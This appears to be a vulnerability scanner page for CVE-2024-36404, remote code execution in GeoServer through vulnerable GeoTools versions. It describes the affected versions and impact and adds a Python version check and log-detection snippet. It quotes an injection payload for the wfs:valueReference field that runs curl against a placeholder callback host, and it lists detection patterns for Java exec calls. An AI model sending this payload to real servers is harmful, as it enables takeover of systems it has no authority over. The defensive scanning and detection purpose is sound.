CVE-2024-36404 Scanner
CVE-2024-36404 Scanner - Remote Code Execution vulnerability in GeoServer
Short Info
Level: Critical
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 10 days 2 hours
Scan only one: Domain, IPv4
Toolbox: -
GeoServer is an open-source server for sharing geospatial data across multiple platforms. It is widely used by GIS professionals for visualizing and editing geospatial data in both desktop and web applications. The server supports various spatial data formats and provides WMS, WFS, and other services for sharing geospatial data. GeoServer is deployed in environments ranging from the governmental to the commercial sector, and it integrates with the GeoTools library for geospatial analysis. A critical vulnerability exists in GeoServer when it is used with GeoTools versions prior to 31.2, 30.4, and 29.6. The flaw exposes GeoServer to remote code execution when the affected GeoTools functionality is reached with attacker-controlled input.
The vulnerability is a Remote Code Execution (RCE) flaw that arises when GeoServer evaluates XPath expressions supplied in user input. It is specifically associated with GeoTools versions prior to 31.2, 30.4, and 29.6. The flaw allows an attacker to execute arbitrary Java code on the server by injecting a malicious payload through the affected GeoTools functionality, which can lead to unauthorized command or code execution and compromise the integrity of the entire server environment. The vulnerability is mitigated by updating to the fixed versions or by applying workarounds that limit the affected GeoTools functionality; installations still running versions without the fix remain vulnerable and should be updated immediately.
The vulnerability is triggered when GeoServer, which relies on GeoTools for XPath evaluation, processes user-controlled input. That input can arrive in a WFS request whose parameter causes GeoServer to execute arbitrary Java code: the attacker injects a payload into the `wfs:valueReference` field of the WFS request. In particular, an attacker can pass an expression such as `exec(java.lang.Runtime.getRuntime(),'curl {{interactsh-url}}')` to achieve remote code execution. The vulnerability specifically affects configurations where GeoServer is paired with a vulnerable GeoTools version, where unsanitized handling of this input leads to RCE.
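As an added example (not code from this page, nor from GeoServer or GeoTools), the following Python checks a reported GeoTools version against the fixed releases named above and flags WFS requests whose `valueReference` value calls into Java instead of naming a feature property. The sample requests are constructed, and the treatment of release lines outside 29 to 31 is an assumption.

```python
import re
from urllib.parse import unquote

# Fixed GeoTools releases named on the page: 31.2, 30.4 and 29.6.
FIXED_MINOR_BY_MAJOR = {29: 6, 30: 4, 31: 2}

def geotools_is_fixed(version: str) -> bool:
    """True if a GeoTools version string such as '30.3' carries the fix.
    Assumption (not stated on the page): release lines newer than 31 ship
    the fix, and lines older than 29 never received a backport."""
    m = re.match(r"^\s*(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised GeoTools version: {version!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    if major in FIXED_MINOR_BY_MAJOR:
        return minor >= FIXED_MINOR_BY_MAJOR[major]
    return major > 31

# A legitimate valueReference names a feature property or a simple XPath path
# (e.g. 'topp:STATE_NAME'); Java class names or function calls are the signal.
SUSPICIOUS = re.compile(r"java\.lang\.|\bexec\s*\(|getRuntime|ProcessBuilder", re.I)

# valueReference as a child element, as an XML attribute (WFS 2.0 POST body)
# or as a KVP query parameter (GET request).
VALUE_REF = re.compile(
    r"<wfs:valueReference>\s*(.*?)\s*</wfs:valueReference>"
    r'|valueReference\s*=\s*"([^"]*)"'
    r"|valueReference=([^&\s]+)",
    re.I | re.S)

def suspicious_value_references(request_text: str) -> list:
    """Return every valueReference in a WFS request that matches SUSPICIOUS."""
    hits = []
    for element, attribute, kvp in VALUE_REF.findall(request_text):
        value = unquote(element or attribute or kvp)
        if SUSPICIOUS.search(value):
            hits.append(value)
    return hits

# Constructed sample requests (not captured traffic); the second carries the
# expression quoted on the page.
BENIGN_REQUEST = """<wfs:GetPropertyValue service="WFS" version="2.0.0"
    valueReference="topp:STATE_NAME">
  <wfs:Query typeNames="topp:states"/>
</wfs:GetPropertyValue>"""
PAYLOAD_REQUEST = """<wfs:GetPropertyValue service="WFS" version="2.0.0"
    valueReference="exec(java.lang.Runtime.getRuntime(),'curl {{interactsh-url}}')">
  <wfs:Query typeNames="topp:states"/>
</wfs:GetPropertyValue>"""
```

Run `suspicious_value_references` over WFS request bodies or query strings from your access logs to surface requests worth investigating on hosts that `geotools_is_fixed` reports as unpatched.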
Exploiting this vulnerability can lead to complete server compromise. An attacker who executes arbitrary code remotely can alter server configuration, access sensitive data, or launch further attacks within the network. Malicious actors may use the flaw to deploy malware, manipulate geospatial data, or control other systems connected to the compromised GeoServer. Such exploitation can disrupt services, cause data loss, and pose significant risk to the organization's infrastructure and data integrity. If left unpatched, the vulnerability could allow an attacker to maintain persistent access, making it a critical security concern.